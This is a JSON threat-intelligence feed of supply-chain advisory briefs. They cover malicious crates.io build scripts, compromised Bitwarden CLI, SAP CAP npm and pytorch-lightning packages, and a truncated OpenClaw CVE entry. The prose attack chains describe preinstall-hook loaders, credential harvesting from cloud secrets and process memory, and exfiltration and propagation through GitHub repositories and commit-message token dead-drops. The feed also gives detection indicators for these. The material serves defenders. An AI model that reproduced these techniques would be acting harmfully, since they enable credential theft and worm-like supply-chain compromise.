{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/supply-chain/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["mysten-metrics"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","malware","rust"],"_cs_type":"advisory","_cs_vendors":["MystenLabs"],"content_html":"\u003cp\u003eOn April 20, 2026, a malicious crate named \u003ccode\u003emysten-metrics\u003c/code\u003e was published to crates.io. This crate contained a build script designed to exfiltrate data from the machine during the build process. The crate was identified and removed from crates.io. At the time of removal, only one version of the crate had been published, and there was no evidence of actual usage. The crate had no dependencies on crates.io, limiting the potential spread. This incident highlights the risks associated with supply chain attacks targeting software build processes and the importance of verifying the integrity of third-party dependencies.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker publishes the \u003ccode\u003emysten-metrics\u003c/code\u003e crate to crates.io.\u003c/li\u003e\n\u003cli\u003eA developer adds \u003ccode\u003emysten-metrics\u003c/code\u003e as a dependency to their project.\u003c/li\u003e\n\u003cli\u003eThe developer builds the project using \u003ccode\u003ecargo build\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eAs part of the build process, the malicious build script within \u003ccode\u003emysten-metrics\u003c/code\u003e is executed.\u003c/li\u003e\n\u003cli\u003eThe build script collects sensitive data from the build environment (e.g., environment variables, file contents, system information).\u003c/li\u003e\n\u003cli\u003eThe build script attempts to exfiltrate the collected data to a remote attacker-controlled server. The exact exfiltration method is not specified, but could involve HTTP/S requests or DNS tunneling.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the exfiltrated data from the compromised build machine.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe successful execution of the malicious build script could lead to the exposure of sensitive information, including API keys, credentials, source code, and other confidential data present on the build machine. This data could be used to compromise the developer\u0026rsquo;s infrastructure, intellectual property, and customer data. Since there were no known usages, the impact was contained by its early removal.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImplement integrity checks for all third-party dependencies to identify and prevent the use of malicious packages.\u003c/li\u003e\n\u003cli\u003eMonitor network connections originating from build processes for suspicious outbound traffic, as this could indicate data exfiltration. Create network connection rules.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring on build machines to detect unauthorized modifications to files during the build process.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:43:56Z","date_published":"2026-05-04T21:43:56Z","id":"/briefs/2026-05-mysten-metrics-exfiltration/","summary":"The `mysten-metrics` crate was removed from crates.io after it was found to contain a malicious build script that attempted to exfiltrate data from the build machine during the build process.","title":"Malicious mysten-metrics Crate Exfiltrates Build Machine Data","url":"https://feed.craftedsignal.io/briefs/2026-05-mysten-metrics-exfiltration/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["sui-execution-cut"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","malware","rust"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eOn April 20, 2026, a malicious crate named \u003ccode\u003esui-execution-cut\u003c/code\u003e was published to crates.io. This crate included a build script that, when executed, attempted to exfiltrate data from the machine on which the crate was being built. The crate had no dependencies and only one version was ever published. The malicious package was quickly removed from crates.io after discovery. While the crate was available for a short period, there is no evidence of actual usage, however, supply chain compromises can have a wide impact if successful, and even this low-usage crate warrants monitoring.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA developer adds the malicious \u003ccode\u003esui-execution-cut\u003c/code\u003e crate as a dependency to their Rust project.\u003c/li\u003e\n\u003cli\u003eDuring the build process, the \u003ccode\u003ecargo\u003c/code\u003e build system executes the build script embedded within the \u003ccode\u003esui-execution-cut\u003c/code\u003e crate.\u003c/li\u003e\n\u003cli\u003eThe build script executes a series of commands designed to gather sensitive information from the build environment.\u003c/li\u003e\n\u003cli\u003eThe script establishes an outbound network connection to a remote server controlled by the attacker.\u003c/li\u003e\n\u003cli\u003eThe gathered data is transmitted to the attacker\u0026rsquo;s server via HTTP POST or a similar method.\u003c/li\u003e\n\u003cli\u003eThe attacker receives the exfiltrated data, which could include environment variables, file contents, or other sensitive information.\u003c/li\u003e\n\u003cli\u003eThe attacker analyzes the stolen data for valuable secrets, credentials, or intellectual property.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe \u003ccode\u003esui-execution-cut\u003c/code\u003e crate, if used, could have compromised developer machines by exfiltrating sensitive data during the build process. Although the crate was quickly removed and showed no signs of usage, a successful attack of this nature could lead to the exposure of secrets, credentials, and intellectual property. The lack of usage limits the impact, but the nature of supply chain attacks makes even low-usage crates a potential risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor for unexpected network connections originating from build processes, especially connections to unknown or suspicious domains. Use the \u0026ldquo;Detect Suspicious Outbound Connections from Build Processes\u0026rdquo; Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement strict dependency review processes to identify and prevent the introduction of malicious packages into your software supply chain.\u003c/li\u003e\n\u003cli\u003eContinuously monitor crates.io and other package repositories for reports of malicious packages and promptly remove them from your dependencies if identified.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T21:42:55Z","date_published":"2026-05-04T21:42:55Z","id":"/briefs/2026-05-sui-execution-cut-exfiltration/","summary":"The `sui-execution-cut` crate on crates.io contained a build script designed to exfiltrate data from the build machine during the build process.","title":"Malicious sui-execution-cut Crate Exfiltrates Build Machine Data","url":"https://feed.craftedsignal.io/briefs/2026-05-sui-execution-cut-exfiltration/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Bitwarden CLI"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","exfiltration","npm"],"_cs_type":"advisory","_cs_vendors":["Bitwarden"],"content_html":"\u003cp\u003eA compromised Bitwarden CLI npm package allows a remote, anonymous attacker to steal credentials and exfiltrate sensitive information. The specific version of the compromised package is not detailed in the advisory. This supply chain attack targets developers and users who rely on the Bitwarden CLI for managing their passwords and secrets. This attack has the potential to expose sensitive credentials, leading to unauthorized access to systems and data. Defenders need to monitor for unusual activity related to the Bitwarden CLI and its usage within their environments to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises a Bitwarden CLI npm package through techniques such as typosquatting, account compromise, or dependency confusion.\u003c/li\u003e\n\u003cli\u003eUnsuspecting developers or users download and install the compromised package from the npm registry.\u003c/li\u003e\n\u003cli\u003eDuring installation, the malicious package executes malicious code injected by the attacker.\u003c/li\u003e\n\u003cli\u003eThe malicious code collects Bitwarden credentials and other sensitive information stored in the CLI\u0026rsquo;s configuration.\u003c/li\u003e\n\u003cli\u003eThe compromised package establishes a covert communication channel (e.g., HTTPS) to an attacker-controlled server.\u003c/li\u003e\n\u003cli\u003eStolen credentials and sensitive information are exfiltrated to the attacker\u0026rsquo;s server.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen credentials to access victim\u0026rsquo;s Bitwarden vaults or other systems.\u003c/li\u003e\n\u003cli\u003eThe attacker may further escalate privileges and compromise additional systems within the victim\u0026rsquo;s environment using the stolen credentials.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation leads to the theft of sensitive credentials and information stored within Bitwarden CLI. The number of victims is currently unknown. Organizations using the compromised package could experience unauthorized access to critical systems, data breaches, and potential financial losses. The targeted sectors are broad, encompassing any organization utilizing the Bitwarden CLI for password management and secret storage.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for unusual activity or unexpected dependencies using process creation logs and file integrity monitoring.\u003c/li\u003e\n\u003cli\u003eImplement strict code review processes for all third-party dependencies, especially those related to security tools like Bitwarden CLI.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule detecting suspicious network connections from the Bitwarden CLI executable to identify potential data exfiltration.\u003c/li\u003e\n\u003cli\u003eEnforce multi-factor authentication (MFA) on Bitwarden accounts to mitigate the impact of credential theft.\u003c/li\u003e\n\u003cli\u003eRegularly audit and review the permissions and access rights associated with Bitwarden CLI credentials.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-04T11:28:56Z","date_published":"2026-05-04T11:28:56Z","id":"/briefs/2026-05-bitwarden-cli-compromise/","summary":"A remote attacker can exploit a compromised Bitwarden CLI npm package to steal credentials and exfiltrate sensitive information.","title":"Compromised Bitwarden CLI npm Package Enables Credential Theft and Information Exfiltration","url":"https://feed.craftedsignal.io/briefs/2026-05-bitwarden-cli-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["@bitwarden/cli (2026.4.0)","@cap-js/sqlite (2.2.2)","@cap-js/postgres (2.2.2)","@cap-js/db-service (2.10.1)","mbt (1.2.48)","SAP Cloud Application Programming (CAP) Model","checkmarx/kics"],"_cs_severities":["high"],"_cs_tags":["npm","supply-chain","credential-theft","github"],"_cs_type":"threat","_cs_vendors":["npm","GitHub","SAP","Bitwarden","Checkmarx","Microsoft"],"content_html":"\u003cp\u003eThe npm ecosystem is experiencing a surge in sophisticated supply chain attacks following the Shai-Hulud worm in September 2025. Attackers, including TeamPCP, are actively compromising npm packages to gain access to sensitive information and establish persistence within CI/CD pipelines. The attacks have evolved to include wormable propagation, infrastructure-level persistence, and multi-stage payloads designed to evade detection. In April 2026, two campaigns were observed: one included the string \u0026ldquo;Shai-Hulud: The Third Coming,\u0026rdquo; and the other, dubbed \u0026ldquo;Mini Shai-Hulud,\u0026rdquo; targeted the SAP developer ecosystem. The compromised packages are often part of SAP\u0026rsquo;s Cloud Application Programming (CAP) Model and multitarget application (MTA) build toolchain, increasing the likelihood of impacting enterprise developers and CI/CD pipelines with access to cloud credentials and GitHub tokens.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eInitial Compromise: Attackers compromise legitimate npm packages, such as @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt, by injecting malicious code.\u003c/li\u003e\n\u003cli\u003eMalicious Code Injection: Compromised packages receive two new files: setup.mjs and execution.js, along with a modified package.json containing a \u0026ldquo;preinstall\u0026rdquo; hook.\u003c/li\u003e\n\u003cli\u003eExecution of setup.mjs: During the \u003ccode\u003enpm install\u003c/code\u003e process, the preinstall hook executes setup.mjs, which detects the host OS and architecture.\u003c/li\u003e\n\u003cli\u003eBun Runtime Download and Execution: setup.mjs downloads the Bun JavaScript runtime (v1.3.13) from GitHub releases and extracts it to a temporary directory.\u003c/li\u003e\n\u003cli\u003eExecution of execution.js: The Bun runtime executes execution.js, a large (11.7 MB) obfuscated credential stealer and propagation framework.\u003c/li\u003e\n\u003cli\u003eCredential Harvesting: execution.js harvests GitHub tokens, npm tokens, environment variables, GitHub Actions secrets, AWS STS identity, Azure Key Vault secrets, GCP Secret Manager values, and Kubernetes service account tokens. It also targets Claude and MCP configuration files and Electrum wallets.\u003c/li\u003e\n\u003cli\u003eData Exfiltration: The collected data is compressed, encrypted, and exfiltrated to freshly created public GitHub repositories with randomized names and descriptions.\u003c/li\u003e\n\u003cli\u003ePropagation: The malware searches for commits containing the keyword \u0026ldquo;OhNoWhatsGoingOnWithGitHub,\u0026rdquo; decodes matching commit messages as a token dead-drop, recovers stolen GitHub tokens, and uses them to spread the malware to other packages.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eCompromised npm packages can lead to the theft of sensitive credentials, including cloud provider credentials, GitHub tokens, and CI/CD secrets. Successful attacks can result in unauthorized access to cloud infrastructure, code repositories, and deployment pipelines. The Mini Shai-Hulud campaign targeted packages with approximately 570,000 weekly downloads, potentially impacting a large number of SAP developers and enterprise environments. The attackers use stolen credentials to further propagate the malware, increasing the scale and scope of the compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRotate npm tokens and GitHub Personal Access Tokens (PATs) immediately if any affected packages were installed (refer to the list of affected packages in the IOC table).\u003c/li\u003e\n\u003cli\u003eMonitor npm install processes for unexpected execution of \u003ccode\u003enode setup.mjs\u003c/code\u003e (see Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement the Sigma rule \u0026ldquo;Detect Suspicious Bun Process Execution\u0026rdquo; to identify potential execution of the Bun runtime from temporary directories.\u003c/li\u003e\n\u003cli\u003eMonitor network connections for unusual processes connecting to \u003ccode\u003eapi.github[.]com/search/commits?q=OhNoWhatsGoingOnWithGitHub\u003c/code\u003e (see IOCs) to detect potential C2 activity.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Github Commit By Claude Email\u0026rdquo; to identify commits authored with the email \u003ccode\u003eclaude@users.noreply.github.com\u003c/code\u003e to detect malicious commits.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-02T00:10:33Z","date_published":"2026-05-02T00:10:33Z","id":"/briefs/2026-05-npm-supply-chain/","summary":"Threat actors are compromising npm packages, including those targeting SAP developers, to steal credentials, embed themselves in CI/CD pipelines, and deploy multi-stage payloads using techniques like wormable propagation and covert C2 channels on GitHub.","title":"Increased npm Supply Chain Attacks Targeting SAP Developers","url":"https://feed.craftedsignal.io/briefs/2026-05-npm-supply-chain/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["pytorch-lightning"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","pypi","credential-theft","malware"],"_cs_type":"advisory","_cs_vendors":["GitHub"],"content_html":"\u003cp\u003eOn April 30, 2026, two malicious versions (2.6.2 and 2.6.3) of the widely used \u003ccode\u003epytorch-lightning\u003c/code\u003e package were published to the PyPI registry after the publisher account was compromised. These versions contain embedded malicious code designed to steal developer credentials and republish infected versions of repositories to which the stolen tokens have access. The attack is triggered upon importing the package, initiating a background process that silently harvests credentials from a wide array of services, including AWS, Azure, Google Cloud, and GitHub, as well as local environment variables and credential files. Version 2.6.3 was published just 13 minutes after 2.6.2, and was intended to evade detection.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker compromises the publisher account for the \u003ccode\u003epytorch-lightning\u003c/code\u003e package on PyPI.\u003c/li\u003e\n\u003cli\u003eAttacker publishes malicious versions 2.6.2 and 2.6.3 to PyPI.\u003c/li\u003e\n\u003cli\u003eA modified \u003ccode\u003e__init__.py\u003c/code\u003e file within the package initiates a background process upon import.\u003c/li\u003e\n\u003cli\u003eThe background process executes silently, without any visible output or indication of compromise to the user.\u003c/li\u003e\n\u003cli\u003eThe malicious package downloads a runtime (Bun) from GitHub.\u003c/li\u003e\n\u003cli\u003eThe package executes a large, obfuscated JavaScript file, targeting AWS, Azure, Google Cloud, GitHub, and local credential stores.\u003c/li\u003e\n\u003cli\u003eStolen credentials, including cloud provider keys, API tokens, and secrets, are exfiltrated to attacker-controlled infrastructure.\u003c/li\u003e\n\u003cli\u003eThe malware attempts to download and execute a second-stage payload from attacker-controlled infrastructure, expanding the scope of the attack.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eOrganizations that downloaded and used versions 2.6.2 or 2.6.3 of the \u003ccode\u003epytorch-lightning\u003c/code\u003e package are at high risk of compromise. The malicious package is designed to steal a wide range of credentials, including cloud provider keys, API tokens, and secrets stored in environment variables. This can lead to unauthorized access to sensitive data and systems, potentially resulting in data breaches, financial losses, and reputational damage. The malware\u0026rsquo;s ability to download and execute secondary payloads further increases the potential impact.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately remove versions 2.6.2 and 2.6.3 of the \u003ccode\u003elightning\u003c/code\u003e package from all systems where they are installed (see overview).\u003c/li\u003e\n\u003cli\u003eAudit systems for unauthorized processes and review outbound network connections to detect potential compromises (see overview).\u003c/li\u003e\n\u003cli\u003eRotate all cloud provider keys (AWS, Azure, GCP), API tokens (GitHub, CI/CD systems), and secrets stored in environment variables to prevent further unauthorized access (see Attack Chain).\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect Suspicious PyPI Package Installation\u003c/code\u003e Sigma rule to identify potential malicious packages being installed in the future (see rules).\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect Credential Harvesting via Bun\u003c/code\u003e Sigma rule to catch execution of the malicious JavaScript payload (see rules).\u003c/li\u003e\n\u003cli\u003ePin dependencies to known-good versions and verify package integrity before use to prevent future supply chain attacks (see references).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-01T00:45:31Z","date_published":"2026-05-01T00:45:31Z","id":"/briefs/2026-05-pytorch-lightning-compromise/","summary":"Compromised PyTorch Lightning packages versions 2.6.2 and 2.6.3 on PyPI contain malicious code to steal developer credentials from cloud and developer environments, and republish infected packages.","title":"Compromised PyTorch Lightning Packages on PyPI Steal Developer Credentials","url":"https://feed.craftedsignal.io/briefs/2026-05-pytorch-lightning-compromise/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Cloud Application Programming (CAP)","Cloud MTA Build Tool","@cap-js/db-service","@cap-js/postgres","@cap-js/sqlite","github.com"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","npm","sap","credential-theft"],"_cs_type":"threat","_cs_vendors":["SAP","GitHub"],"content_html":"\u003cp\u003eThe Mini Shai-Hulud campaign, active as of April 2026, targets SAP NPM packages used in the SAP Cloud Application Programming (CAP) ecosystem and SAP cloud deployment workflows. Four package versions were compromised: \u003ccode\u003embt 1.2.48\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service 2.10.1\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres 2.2.2\u003c/code\u003e, and \u003ccode\u003e@cap-js/sqlite 2.2.2\u003c/code\u003e. These packages, with over 500,000 combined weekly downloads, are essential for SAP\u0026rsquo;s Cloud MTA Build Tool and database services for CAP software. The attackers injected a preinstall script that fetches and executes a Bun binary, bypassing security monitoring. The malicious versions were available for a short window of 2-4 hours before being unpublished and superseded by clean versions. Wiz attributes this activity to TeamPCP due to a shared RSA public key used to encrypt the exfiltrated secrets.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker compromises an NPM token, possibly exposed through CircleCI.\u003c/li\u003e\n\u003cli\u003eThe attacker injects a malicious \u003ccode\u003epreinstall\u003c/code\u003e script into the targeted SAP NPM packages (\u003ccode\u003embt\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres\u003c/code\u003e, \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eWhen a user installs the compromised package, the \u003ccode\u003epreinstall\u003c/code\u003e script executes.\u003c/li\u003e\n\u003cli\u003eThe script fetches a Bun ZIP archive from a GitHub repository.\u003c/li\u003e\n\u003cli\u003eThe script extracts the Bun archive and executes the included Bun binary.\u003c/li\u003e\n\u003cli\u003eThe Bun binary steals local credentials, GitHub and NPM tokens, AWS, Azure, GCP, GitHub Action, and Kubernetes secrets.\u003c/li\u003e\n\u003cli\u003eThe stolen data is exfiltrated to public GitHub repositories with the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe malware propagates by modifying package tarballs, updating versions, repackaging them, and publishing them using stolen GitHub Actions tokens.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe Mini Shai-Hulud attack poses a significant threat to developers and organizations using SAP CAP, a framework for S/4HANA extensions, Fiori app backends, MTAs, and integration flows. With over 500,000 weekly downloads of the affected packages, a large number of systems could have been affected. Successful exploitation allows attackers to steal sensitive credentials and cloud secrets, potentially leading to unauthorized access to critical SAP systems, cloud infrastructure, and source code repositories. This access could be used for further malicious activities, including data breaches, financial fraud, and supply chain compromise.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eOrganizations using SAP Business Technology Platform workflows, SAP CAP, or MTA-based deployment pipelines should immediately check if they installed the malicious package versions (\u003ccode\u003embt 1.2.48\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service 2.10.1\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres 2.2.2\u003c/code\u003e, \u003ccode\u003e@cap-js/sqlite 2.2.2\u003c/code\u003e) during the exposure window.\u003c/li\u003e\n\u003cli\u003eImplement network monitoring rules to detect connections to unusual GitHub repositories created to host stolen data. Monitor for repositories with the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eMonitor process execution for the execution of \u003ccode\u003ebun\u003c/code\u003e binaries in unusual or unexpected locations to identify systems where compromised packages were installed. Deploy the Sigma rule \u003ccode\u003eDetect Bun Execution From NPM Package\u003c/code\u003e to detect this behavior.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-30T14:27:36Z","date_published":"2026-04-30T14:27:36Z","id":"/briefs/2026-04-mini-shai-hulud/","summary":"The Mini Shai-Hulud campaign injected malicious code into SAP NPM packages, targeting credentials and cloud secrets related to SAP Cloud Application Programming (CAP) and SAP cloud deployment workflows, exfiltrating data through public GitHub repositories.","title":"Mini Shai-Hulud Supply Chain Attack Targets SAP NPM Packages","url":"https://feed.craftedsignal.io/briefs/2026-04-mini-shai-hulud/"},{"_cs_actors":["TeamPCP"],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Cloud Application Programming Model (CAP)","Cloud MTA"],"_cs_severities":["critical"],"_cs_tags":["supply-chain","credential-theft","npm"],"_cs_type":"threat","_cs_vendors":["SAP"],"content_html":"\u003cp\u003eOn April 29, 2026, security researchers discovered that multiple official SAP npm packages were compromised in a supply-chain attack, suspected to be carried out by TeamPCP. The compromised packages, including \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/postgres\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/db-service\u003c/code\u003e (v2.10.1), and \u003ccode\u003embt\u003c/code\u003e (v1.2.48), support SAP\u0026rsquo;s Cloud Application Programming Model (CAP) and Cloud MTA, commonly used in enterprise development. The attack involves injecting a malicious \u0026lsquo;preinstall\u0026rsquo; script into these packages, which executes automatically during installation. This script downloads and executes a heavily obfuscated JavaScript payload designed to steal sensitive credentials from developer machines and CI/CD environments. This incident highlights the ongoing risk of supply chain attacks targeting widely used development tools.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003e\u003cstrong\u003eInitial Compromise:\u003c/strong\u003e Threat actors compromise official SAP npm packages (\u003ccode\u003e@cap-js/sqlite\u003c/code\u003e, \u003ccode\u003e@cap-js/postgres\u003c/code\u003e, \u003ccode\u003e@cap-js/db-service\u003c/code\u003e, \u003ccode\u003embt\u003c/code\u003e). The exact method of initial compromise is currently unknown, but a misconfigured CircleCI job is suspected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePackage Modification:\u003c/strong\u003e The compromised npm packages are modified to include a malicious \u0026lsquo;preinstall\u0026rsquo; script.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eInstallation Trigger:\u003c/strong\u003e When developers install the compromised packages using \u003ccode\u003enpm install\u003c/code\u003e, the \u0026lsquo;preinstall\u0026rsquo; script executes automatically.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003ePayload Download:\u003c/strong\u003e The \u0026lsquo;preinstall\u0026rsquo; script launches a loader named \u003ccode\u003esetup.mjs\u003c/code\u003e that downloads the Bun JavaScript runtime from GitHub.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eExecution of Information Stealer:\u003c/strong\u003e The Bun runtime is used to execute a heavily obfuscated \u003ccode\u003eexecution.js\u003c/code\u003e payload, which acts as an information stealer.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eCredential Theft:\u003c/strong\u003e The information stealer targets a wide variety of credentials, including npm and GitHub authentication tokens, SSH keys, cloud credentials for AWS, Azure, and Google Cloud, Kubernetes configurations and secrets, and CI/CD pipeline secrets and environment variables.  It also attempts to extract secrets directly from the CI runner\u0026rsquo;s memory by scanning \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/maps\u003c/code\u003e and \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/mem\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eData Exfiltration:\u003c/strong\u003e The stolen data is encrypted and uploaded to public GitHub repositories under the victim\u0026rsquo;s account. These repositories include the description \u0026ldquo;A Mini Shai-Hulud has Appeared\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eLateral Movement:\u003c/strong\u003e The malware searches GitHub commits for the string \u003ccode\u003eOhNoWhatsGoingOnWithGitHub:\u0026lt;base64\u0026gt;\u003c/code\u003e, decoding matching commit messages into GitHub tokens to gain further access and propagate to other packages and repositories, injecting the same malicious code.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThis supply chain attack can lead to the theft of sensitive credentials, allowing attackers to gain unauthorized access to internal systems, cloud infrastructure, and source code repositories. The compromised credentials and secrets can be used for lateral movement within the victim\u0026rsquo;s network, data exfiltration, and further supply chain attacks. The use of stolen credentials to modify other packages increases the scope of the attack, potentially impacting a large number of developers and organizations using the compromised SAP packages.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor npm package installations for the presence of \u003ccode\u003epreinstall\u003c/code\u003e scripts executing unusual processes, such as the execution of \u003ccode\u003esetup.mjs\u003c/code\u003e or the download of the Bun JavaScript runtime from GitHub; implement the \u003ccode\u003eDetect Suspicious NPM Package Preinstall Script\u003c/code\u003e Sigma rule.\u003c/li\u003e\n\u003cli\u003eImplement the \u003ccode\u003eDetect GitHub Repository Creation with \u0026quot;A Mini Shai-Hulud has Appeared\u0026quot; Description\u003c/code\u003e Sigma rule to detect exfiltration attempts via public GitHub repositories.\u003c/li\u003e\n\u003cli\u003eAudit CI/CD pipeline configurations and restrict access to sensitive credentials and secrets to prevent exposure via misconfigured jobs; remediate the reported CircleCI misconfiguration.\u003c/li\u003e\n\u003cli\u003eMonitor process memory for credential harvesting activity targeting Runner processes in CI/CD environments, specifically looking for reads of \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/maps\u003c/code\u003e and \u003ccode\u003e/proc/\u0026lt;pid\u0026gt;/mem\u003c/code\u003e as outlined in the overview.\u003c/li\u003e\n\u003cli\u003eDeprecate and remove the compromised packages \u003ccode\u003e@cap-js/sqlite\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/postgres\u003c/code\u003e (v2.2.2), \u003ccode\u003e@cap-js/db-service\u003c/code\u003e (v2.10.1), and \u003ccode\u003embt\u003c/code\u003e (v1.2.48) from your development and CI/CD environments.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-29T22:43:44Z","date_published":"2026-04-29T22:43:44Z","id":"/briefs/2026-04-sap-npm-compromise/","summary":"Multiple official SAP npm packages were compromised via a supply chain attack, likely by TeamPCP, to steal credentials and authentication tokens from developers' systems.","title":"Compromised SAP npm Packages Steal Developer Credentials","url":"https://feed.craftedsignal.io/briefs/2026-04-sap-npm-compromise/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-41387"}],"_cs_exploited":false,"_cs_products":["OpenClaw"],"_cs_severities":["high"],"_cs_tags":["vulnerability","supply-chain","environment-variable"],"_cs_type":"advisory","_cs_vendors":["OpenClaw"],"content_html":"\u003cp\u003eOpenClaw versions prior to 2026.3.22 contain a vulnerability related to incomplete sanitization of host environment variables. This flaw, found in \u003ccode\u003ehost-env-security-policy.json\u003c/code\u003e and \u003ccode\u003ehost-env-security.ts\u003c/code\u003e, allows for the overriding of package manager environment settings. An attacker can leverage this vulnerability to redirect approved execution requests, manipulating the package resolution process or the runtime bootstrap. By doing so, they can point these processes to attacker-controlled infrastructure. This enables the execution of trojanized content, potentially leading to supply chain attacks or arbitrary code execution within the affected environment. The vulnerability is identified as CVE-2026-41387.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies an OpenClaw instance running a version prior to 2026.3.22.\u003c/li\u003e\n\u003cli\u003eAttacker crafts malicious environment variables designed to override the package manager\u0026rsquo;s default 